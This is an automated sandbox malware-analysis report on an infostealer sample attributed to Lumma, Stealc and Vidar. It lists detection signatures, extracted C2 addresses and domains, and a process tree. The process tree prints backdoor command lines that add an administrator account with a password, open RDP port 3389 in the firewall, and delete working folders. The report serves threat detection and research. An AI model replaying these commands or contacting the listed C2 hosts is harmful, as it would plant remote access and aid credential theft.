Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519761
MD5:	ccc8fb5c5637dd0a4d32552bd9203ce6
SHA1:	3fb0f2b266d91f465e9abb930d85867a65e8eec9
SHA256:	2a9f856bc9fe5a41540aa3800cd8e50adfbfbc3661845a9791c02c13bcadddf6
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a new user with administrator rights

Allocates memory in foreign processes

Allows multiple concurrent remote connection

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Enables remote desktop connection

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the windows firewall

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Sigma detected: RDP Sensitive Settings Changed

Sigma detected: Suspicious Add User to Remote Desktop Users Group

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected RDPWrap Tool

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: New User Created Via Net.EXE

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 5704 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CCC8FB5C5637DD0A4D32552BD9203CE6)

conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 6004 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAFHDHCAAKE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

userAFHDHCAAKE.exe (PID: 7136 cmdline: "C:\Users\userAFHDHCAAKE.exe" MD5: F73186DF5A030CF7F186B0737C3AF1F7)

conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2000 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 528 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

BKFHCGIDBA.exe (PID: 8036 cmdline: "C:\ProgramData\BKFHCGIDBA.exe" MD5: 47697A60A96C5ADEF362D8DA9A274B7D)

conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 8088 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

BKJJEBKKEH.exe (PID: 8124 cmdline: "C:\ProgramData\BKJJEBKKEH.exe" MD5: F73186DF5A030CF7F186B0737C3AF1F7)

conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 8188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

GIEBGIIJDG.exe (PID: 1084 cmdline: "C:\ProgramData\GIEBGIIJDG.exe" MD5: 8C46913FBA5CA6A0CB8C4E839EF3A3AE)

cmd.exe (PID: 6164 cmdline: "cmd.exe" /c net user MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 5260 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AEBAFBGIDHCB" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 5424 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cmd.exe (PID: 1816 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGCAEHDBAAE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

userGCAEHDBAAE.exe (PID: 1292 cmdline: "C:\Users\userGCAEHDBAAE.exe" MD5: 47697A60A96C5ADEF362D8DA9A274B7D)

conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 5808 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBGIJEGCGDG.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

userBGIJEGCGDG.exe (PID: 6420 cmdline: "C:\Users\userBGIJEGCGDG.exe" MD5: 8C46913FBA5CA6A0CB8C4E839EF3A3AE)

cmd.exe (PID: 6164 cmdline: "cmd.exe" /c net user MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6484 cmdline: net user MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 4308 cmdline: C:\Windows\system32\net1 user MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 7296 cmdline: net user MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 6552 cmdline: C:\Windows\system32\net1 user MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 5996 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RDPWInst.exe (PID: 4148 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)

netsh.exe (PID: 320 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7380 cmdline: "cmd.exe" /c net user RDPUser_615fbfde V24hFLzx4jqu /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 7420 cmdline: net user RDPUser_615fbfde V24hFLzx4jqu /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 7432 cmdline: C:\Windows\system32\net1 user RDPUser_615fbfde V24hFLzx4jqu /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 7456 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 7504 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 7520 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 7540 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7584 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cmd.exe (PID: 7612 cmdline: "cmd.exe" /c net localgroup "Administrators" RDPUser_615fbfde /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 7656 cmdline: net localgroup "Administrators" RDPUser_615fbfde /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 7676 cmdline: C:\Windows\system32\net1 localgroup "Administrators" RDPUser_615fbfde /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 7692 cmdline: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_615fbfde /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 7732 cmdline: net localgroup "Remote Desktop Users" RDPUser_615fbfde /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 7752 cmdline: C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_615fbfde /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

rdpvideominiport.sys (PID: 4 cmdline: MD5: 77FF15B9237D62A5CBC6C80E5B20A492)

rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)

tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}

Threatname: LummaC

{"C2 url": ["offensivedzvju.shop", "fragnantbui.shop", "reinforcenh.shop", "wallkedsleeoi.shop", "gutterydhowi.shop", "drawzhotdog.shop", "vozmeatillu.shop", "ghostreedmnu.shop", "stogeneratmns.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e90840a846d017e7b095f7543cdf2d15"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\GIEBGIIJDG.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5d9ab0d4c7_rdp[1].exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5d9ab0d4c7_rdp[1].exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\userBGIJEGCGDG.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.2971689518.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000012.00000002.2482597726.0000000002B01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2070552431.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001A.00000000.2254101327.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2536324223.000000000132A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001A.00000002.2307164374.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x5ff8e:$x5: vchost.exe
00000012.00000000.2213860525.0000000000832000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001A.00000000.2254243178.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
Process Memory Space: file.exe PID: 5704	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 5280	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5280	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 5280	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5280	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: userAFHDHCAAKE.exe PID: 7136	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: userAFHDHCAAKE.exe PID: 7136	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: userAFHDHCAAKE.exe PID: 7136	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 528	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 528	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 528	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 528	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: userBGIJEGCGDG.exe PID: 6420	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RDPWInst.exe PID: 4148	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
Process Memory Space: RegAsm.exe PID: 8188	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 8188	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: GIEBGIIJDG.exe PID: 1084	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.2.RegAsm.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
10.2.RegAsm.exe.43dcd8.2.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x222b6:$x5: vchost.exe
10.2.RegAsm.exe.43f8e0.1.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x206ae:$x5: vchost.exe
4.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
18.0.userBGIJEGCGDG.exe.830000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.file.exe.3a65570.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
7.2.userAFHDHCAAKE.exe.3945570.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
7.2.userAFHDHCAAKE.exe.3945570.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3a65570.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
10.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
10.2.RegAsm.exe.400000.0.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x5ff8e:$x5: vchost.exe
10.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
7.2.userAFHDHCAAKE.exe.3945570.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
7.2.userAFHDHCAAKE.exe.3945570.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
26.2.RDPWInst.exe.400000.0.unpack	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
26.2.RDPWInst.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
26.0.RDPWInst.exe.400000.0.unpack	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
26.0.RDPWInst.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Source: Network Connection

Author: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\userBGIJEGCGDG.exe, Initiated: true, ProcessId: 6420, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49729

Sigma detected: RDP Sensitive Settings Changed

Source: Registry Key set

Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 4148, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll

Sigma detected: Suspicious Add User to Remote Desktop Users Group

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_615fbfde /add, CommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_615fbfde /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\userBGIJEGCGDG.exe" , ParentImage: C:\Users\userBGIJEGCGDG.exe, ParentProcessId: 6420, ParentProcessName: userBGIJEGCGDG.exe, ProcessCommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_615fbfde /add, ProcessId: 7692, ProcessName: cmd.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys

Sigma detected: New User Created Via Net.EXE

Source: Process started

